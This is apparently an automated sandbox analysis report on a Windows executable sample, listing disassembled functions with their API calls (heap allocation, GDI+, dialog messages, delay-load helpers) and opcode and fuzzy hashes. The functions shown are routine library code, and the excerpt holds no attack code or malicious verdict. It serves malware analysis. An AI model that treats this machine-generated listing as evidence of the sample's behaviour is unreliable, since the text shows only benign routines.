                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 8be4857f2ac4d7760819688600f980bcde115dc6b6366a80871641c2e57a572e
                • Instruction ID: a8b57f272bf8cc6bf6f74b1cf773c29e65f50b6d0f6ec1330ade17307f52802f
                • Opcode Fuzzy Hash: 8be4857f2ac4d7760819688600f980bcde115dc6b6366a80871641c2e57a572e
                • Instruction Fuzzy Hash: 8871CE71100F449ADB21DF31CCA1AEBB7E9AF14306F44496FE5AA47342DA396A48CF16
                Function 004D837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D8384
                  • Part of subcall function 004D1380: __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D1380: new.LIBCMT ref: 004D13FE
                  • Part of subcall function 004D19A6: __EH_prolog.LIBCMT ref: 004D19AB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: bae90cab72a33ecbbc20dd864a28b0d6009a868335331409a41d7df7f5416eb8
                • Instruction ID: 5bb2c2e5e919dc1be4fbd44d23725c9db3a36da2a9bedbe028b22c4430196daa
                • Opcode Fuzzy Hash: bae90cab72a33ecbbc20dd864a28b0d6009a868335331409a41d7df7f5416eb8
                • Instruction Fuzzy Hash: 1F41C6718406549ADF20DB61CC65BFA73A8AF50308F0440EFE54A93293EF785EC9DB58
                Function 004D1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D1E05
                  • Part of subcall function 004D3B3D: __EH_prolog.LIBCMT ref: 004D3B42
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: aee614c63f4be865503dae7812e4ace3d2301392323108b56d5db9b227481f7b
                • Instruction ID: 4b1580d252efc9a8d694f009df5f5ad5abeeedc12725d3006252787ec8b2f32c
                • Opcode Fuzzy Hash: aee614c63f4be865503dae7812e4ace3d2301392323108b56d5db9b227481f7b
                • Instruction Fuzzy Hash: C0214831944108AFCB11EF9AD9619EEBBF6BF58304B1000AFE845A3361CB365E10CB68
                Function 004EA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004EA7C8
                  • Part of subcall function 004D1380: __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D1380: new.LIBCMT ref: 004D13FE
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: fabf6326748aad4bef2a8f88726a47fbb87f61ddce6337b73eb5947d4512f096
                • Instruction ID: a1a72ab8669643c4089af221aa371c1a30a92983f67008bcc94db8a3e157c2a9
                • Opcode Fuzzy Hash: fabf6326748aad4bef2a8f88726a47fbb87f61ddce6337b73eb5947d4512f096
                • Instruction Fuzzy Hash: D8216D71C04289AACF15EF96C9515EEBBB4BF19304F0004EFE809A3352D7396E16CB65
                Function 004D92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 3047429684ad5300614c9192f8c1579caf9094025f041290a7186be304f2edfc
                • Instruction ID: 21acf5402e985aa6a847c54f3584bac3b0b546c3dbc5717fd3643b8888c2e46b
                • Opcode Fuzzy Hash: 3047429684ad5300614c9192f8c1579caf9094025f041290a7186be304f2edfc
                • Instruction Fuzzy Hash: CD118273A10529ABCF26AFA9CCA19DEB736AF48754F05411BFC04A7351DA388D1087A8
                Function 004FBB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004F85A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004F8FD3,00000001,00000364,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F85EA
                • _free.LIBCMT ref: 004FBBF6
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AllocateHeap_free
                • String ID:
                • API String ID: 614378929-0
                • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                • Instruction ID: 07cccc3a491dcbe70c7ef2a1132bd7b39699e0062ca16e52d15960c6ab2a99ca
                • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                • Instruction Fuzzy Hash: 3901F97320430D6BE3218F66D88596AFBEDFB86370F25051EE69487680EB34B905C779
                Function 004DAA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction ID: 48de557c09410bc120451b4875f628e3284438c26eb6b128a68bd33e5025f4fd
                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction Fuzzy Hash: 9EF08C705007069FDB30DE66C961616B7E8EB21320F208A1FE496C2780EB78D8A4C746
                Function 004F85A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004F8FD3,00000001,00000364,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F85EA
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 5164cd076fbc4f9148c578bfc34d6f5a10ce5a109fd5185b0aba0c99c60b8ba2
                • Instruction ID: debf7f9984a05ab1ec39d3bc4e36c0f6bcecd874825bbb00fe8352463a8e08f9
                • Opcode Fuzzy Hash: 5164cd076fbc4f9148c578bfc34d6f5a10ce5a109fd5185b0aba0c99c60b8ba2
                • Instruction Fuzzy Hash: 74F0243160012D7BEB201A628C01A3B378C9F517A0B14911FAB08EE281CE28DD018AED
                Function 004D5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D5BDC
                  • Part of subcall function 004DB07D: __EH_prolog.LIBCMT ref: 004DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6e84f44e1e57da21026db02237c657a392f493892708a82f3e1edc1dec9dfd0e
                • Instruction ID: e4f12f88d6e77c26014c07487d0e1f3561136a87113d457c4289dd169dfa0c49
                • Opcode Fuzzy Hash: 6e84f44e1e57da21026db02237c657a392f493892708a82f3e1edc1dec9dfd0e
                • Instruction Fuzzy Hash: 37016234905684DAC725F7A5C0653DDF7A49F59708F80419FA85A53383CBB81B08C7AA
                Function 004F8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: cdee789e830d070cad4a58709d12ab57dc629e63af48d43bc0d18b846693ce1e
                • Instruction ID: 16f072c4882d3759f77a76adfc2d72fc846ece4bf36cb707433123884e0571f3
                • Opcode Fuzzy Hash: cdee789e830d070cad4a58709d12ab57dc629e63af48d43bc0d18b846693ce1e
                • Instruction Fuzzy Hash: 2EE0A02154012D7BEB21266A5C01B7B3B8CDB513A4F15122BAF14AE291CE288C0185AE
                Function 004DA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004DA4F5
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 9c115dd706d71d4dfa1c7d88b87c907ee960e69f2f844194fe34e5ed410bc2d4
                • Instruction ID: 14717d8f78c238a3fe98c68637f73c8d0128cebbc8665f445646ac6d0e81a5ae
                • Opcode Fuzzy Hash: 9c115dd706d71d4dfa1c7d88b87c907ee960e69f2f844194fe34e5ed410bc2d4
                • Instruction Fuzzy Hash: B3F0B431009380AACA221B7848247CB7B90AF15335F04CA4FF1F902391C27C14A99727
                Function 004E067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                Download Yara Rule
                APIs
                • SetThreadExecutionState.KERNEL32(00000001), ref: 004E06B1
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 7f5418bf647a245fc27d4f2c9029434caf3f850494b8bec132aa8305906b941e
                • Instruction ID: 0961eea5e5e40a22c0e91f58b1af345e19a39523787efdd6a2d22e3a0aa9871f
                • Opcode Fuzzy Hash: 7f5418bf647a245fc27d4f2c9029434caf3f850494b8bec132aa8305906b941e
                • Instruction Fuzzy Hash: BAD0C22060009025E6213377A85A7FF1B0A0FC2716F09002BB40D533D6CB9E08CAA2AA
                Function 004E9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                Download Yara Rule
                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 004E9D81
                  • Part of subcall function 004E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004E9B30
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction ID: b1f651272a04bb3575754ad446e03f640bc7aff00e87a4b623d69de1ac27757e
                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction Fuzzy Hash: 98D0A53061414C7ADF40BE738C02D7B775CD700301F00416F7C0885181ED75DD109165
                Function 004D9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                Download Yara Rule
                APIs
                • GetFileType.KERNELBASE(000000FF,004D9887), ref: 004D9995
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: ece881ced037fc6a832e7b1de755993d8b32a86787fb795a5c9eedd01a228e8e
                • Instruction ID: 7492ffb3e67ea1e57f7035a494714ed99cce93487edaf79471aab0df69941b82
                • Opcode Fuzzy Hash: ece881ced037fc6a832e7b1de755993d8b32a86787fb795a5c9eedd01a228e8e
                • Instruction Fuzzy Hash: 8BD0C9B1011140A58F218634492909A6655DB83366B28D6EAD025C43A1D736CC02F545
                Function 004ED41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                Download Yara Rule
                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 004ED43F
                  • Part of subcall function 004EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004EAC85
                  • Part of subcall function 004EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004EAC96
                  • Part of subcall function 004EAC74: IsDialogMessageW.USER32(00010418,?), ref: 004EACAA
                  • Part of subcall function 004EAC74: TranslateMessage.USER32(?), ref: 004EACB8
                  • Part of subcall function 004EAC74: DispatchMessageW.USER32(?), ref: 004EACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 60c75451dbf8971dd0752f80993f3f62a5b8b181562f383b423736b35fca4c19
                • Instruction ID: 8f16974df612ef8995e499497496c01b6e3f4518559dc464cca6ab25d2cad0d3
                • Opcode Fuzzy Hash: 60c75451dbf8971dd0752f80993f3f62a5b8b181562f383b423736b35fca4c19
                • Instruction Fuzzy Hash: E5D09E31144300ABDA112B52CE06F1F7AA6AB98B09F004559B345741B1CAA6AD34EB16
                Function 004ED8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 49d273ccb7c59ced55ebdc59559dc51af4011561fe9082729bbfad3f5eecb2e6
                • Instruction ID: 595c79387bcc5e90f56f0488d18e1409eafb5769886f2cbe918332187612db90
                • Opcode Fuzzy Hash: 49d273ccb7c59ced55ebdc59559dc51af4011561fe9082729bbfad3f5eecb2e6
                • Instruction Fuzzy Hash: FFB012A2E6C4426C310CB1076E52E3A074CE7C0B12B30801FB00DD02C0D4445C0F543A
                Function 004ED8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: daac493d669b79e6707e3cd2f768d84b498131f64979ec70d21bc77807da222c
                • Instruction ID: 9cc7196b50e2fd5d274734ef3a47a36ffeb57fc29476a1f6a3af6266da6ebb49
                • Opcode Fuzzy Hash: daac493d669b79e6707e3cd2f768d84b498131f64979ec70d21bc77807da222c
                • Instruction Fuzzy Hash: 45B012A2E6C5826C3148B1077D52E3A074CE7C0B12B30811FB00DD02C0D4845C8A443A
                Function 004ED8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
